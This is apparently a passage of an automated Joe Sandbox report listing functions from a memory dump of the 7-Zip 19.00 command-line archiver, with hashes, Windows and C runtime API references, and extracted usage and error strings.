                                                                                                                                                                                                                                • Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                                                • Instruction ID: 65ecc8042c32900f5c3ab15626ac86d5404cd119b56194a9be08718fdea0b2ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05B19E2260964090CE20FF25E4911BEAB30EFA27D4F885113FE5E47779DF69CA86C752
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001D1C98
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001D1CB9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                • Opcode ID: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
                                                                                                                                                                                                                                • Instruction ID: 81ca271f391331c2ceeda9c4fa938649af604858486d7f15b5a6a560719b48d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3A19032648644A5CB20EF15E49156EBB21E7F67D0F945113FBAE43B69DF38D88ACB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                                                • Instruction ID: af26d7431eb7af3c4aded57c5b7682fa7876106466700907838a60123b258e0f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03513027620A8489C721EE31D8912AA6331F7F6F98F5D8172EF2D1B759DF31D8528360
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs$free$fputc
• String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
• API String ID: 2662072562-1527772849
APIs
Similarity
• API ID: free$memmove
• String ID:
• API String ID: 1534225298-0
APIs
• free.MSVCRT ref: 0020187D
  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
Similarity
• API ID: ExceptionThrowfreemalloc
• String ID:
• API String ID: 2861928636-0
APIs
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
Strings
Similarity
• API ID: free$memmove
• String ID: 2$3$?$?$Z
• API String ID: 1534225298-3338962022
APIs
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
Strings
Similarity
• API ID: free$wcscmp
• String ID: ..\
• API String ID: 4021281200-2756224523
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs$free$fputc
• String ID: Modified: $Path: $Size:
• API String ID: 2662072562-3207571042
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove$ExceptionThrow
• String ID: Incorrect volume size:
• API String ID: 3957182552-1799541332
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
• free.MSVCRT ref: 001DA90A
• free.MSVCRT ref: 001DA9AD
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove
• String ID: /$\
• API String ID: 1534225298-1600464054
APIs
Strings
• 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 00218630
• Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 00218640
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$fputs$memmove
• String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
• API String ID: 2337578458-4238946813
APIs
Strings
• Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 001DFFDA, 001E000E
• Cannot find listfile, xrefs: 001DFF12
• The file operation error for listfile, xrefs: 001DFF71
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$ExceptionThrow
• String ID: Cannot find listfile$Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
• API String ID: 4001284683-1604901869
• Opcode ID: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
• Instruction ID: bd9e3e95749076f33f75912a620f73c56616650728fd81cd2fcc4d0cc65c59f9
• Opcode Fuzzy Hash: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
• Instruction Fuzzy Hash: 6A51D572314B8592CA21DF56E8807AEA721F7A97D4F840126FF9913B59DFB8C946CB00
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$ErrorLast
• String ID:
• API String ID: 408039514-0
• Opcode ID: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
• Instruction ID: 6786b37a11226447217c3dc4b1e2f44031fbf45d22b77c3e19f510e14a30b77e
• Opcode Fuzzy Hash: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
• Instruction Fuzzy Hash: A451832221C94092DA20EF25E49166EB770EBE17A4F541213FB9E437B9EF78D946CB10
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs
• String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
• API String ID: 1795875747-2836439314
• Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
• Instruction ID: ca520d1091d6527d6e12cd6d2b798dadc3b9cb6017f43b7f06d9476cc464dd75
• Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
• Instruction Fuzzy Hash: FC1193B5320591A2EB25DF66EA49398A761F725BC4F448022CF5C03A64DF38CAF9C700
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs$free
• String ID: $ MB$ Memory =
• API String ID: 3873070119-2616823926
• Opcode ID: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
• Instruction ID: 90e925b5692064984a01c38d024601d5571471ac5fff5fa97a4a52e8359f4527
• Opcode Fuzzy Hash: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
• Instruction Fuzzy Hash: 1811F1B220094191EB10DF25E95839A6330F7A4BE5F449222EE7E537B4DF3CC555C700
APIs
• fputs.MSVCRT ref: 002130E7
• fputs.MSVCRT ref: 00213104
• fputs.MSVCRT ref: 00213114
  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
• fputs.MSVCRT ref: 00213132
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs$free
• String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
• API String ID: 3873070119-2741933734
• Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
• Instruction ID: f85e2d66893cc0d7f5b7bc1c8c481fd08998b02b0b4b12469b9369eb09419ea5
• Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
• Instruction Fuzzy Hash: 03F01D75300E55A1EE11DFA6E9983A9A321BB69FD9F849022DE7E03364DF3CC549C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 001D6F6D
• GetTickCount.KERNEL32 ref: 001D6F78
• GetCurrentProcessId.KERNEL32 ref: 001D6F85
  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
• GetTickCount.KERNEL32 ref: 001D7023
• SetLastError.KERNEL32 ref: 001D705C
• GetLastError.KERNEL32 ref: 001D7086
  • Part of subcall function 001D6C84: CreateDirectoryW.KERNEL32 ref: 001D6CA8
Strings
Similarity
• API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThreadfreememmove
• String ID: .tmp$d
• API String ID: 3444860307-2797371523
Similarity
• API ID: free$AddressHandleModuleProc
• String ID: CreateHardLinkW$kernel32.dll
• API String ID: 399046674-294928789
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 7386053c805783c8b149fe4df64e3429d83df24b0f84080fe73c7ae0aa69eb51
                                                                                                                                                                                                                                • Instruction ID: 5d2c8627074d6b7264535eb119794ae0a19394ce2e3dd3aa31257c42372a0c6e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7386053c805783c8b149fe4df64e3429d83df24b0f84080fe73c7ae0aa69eb51
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF515A67219AC485C720DF26E49039E7761F79AB88F445012DF8E67B25CF39C466CB14
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                                                • Instruction ID: 826a3b3aa4b355f0fabbba0d87bd2744cf4f888e494f701c6251f666d1fffd88
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D74105B6215B8482CB24DF26E8942AE6371F7D9F94F459422DB5E43725DF39C4A5C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                                                • Instruction ID: de16441f5ba02673b8486050f7d16ccaa914cc73c01d37e6b03fbbac12c1e208
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B411162371198488CB11AE26DC512EC6231EBB6FA8F1D8176EF3D5B359DF30D8928360
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                                                • Instruction ID: 1d8fd5f7c9143da0aaf5efbe821974c9a48fc264a1ad50c102cd0caf812f70bd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3301D323321944928A04EF26DA9146C7330FBA6B947088166EB3E4BB65DF30E866C364
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: /$\$a$z
                                                                                                                                                                                                                                • API String ID: 1294909896-3795456795
                                                                                                                                                                                                                                • Opcode ID: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                                                • Instruction ID: a24efdde60b341206985f844d9165e3eb034fbe991d92b43d665d6e15f4dd43f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8941E492A2034699DB30EF21D80C6B93B74F311B94FC94226DB55037D6EBBA89F6C701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 0021877E
                                                                                                                                                                                                                                • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 0021878E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$fputs
                                                                                                                                                                                                                                • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                                                                                                                • API String ID: 2444650769-4238946813
                                                                                                                                                                                                                                • Opcode ID: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                                                • Instruction ID: 21c917562b6da6f368847bcda30bed42a10579aca3de159e8f1d6328b91364fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7721A1373156C595DA309F11F9C43EAB361B7A4780FA88422CA5D97B58CF3CC896CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
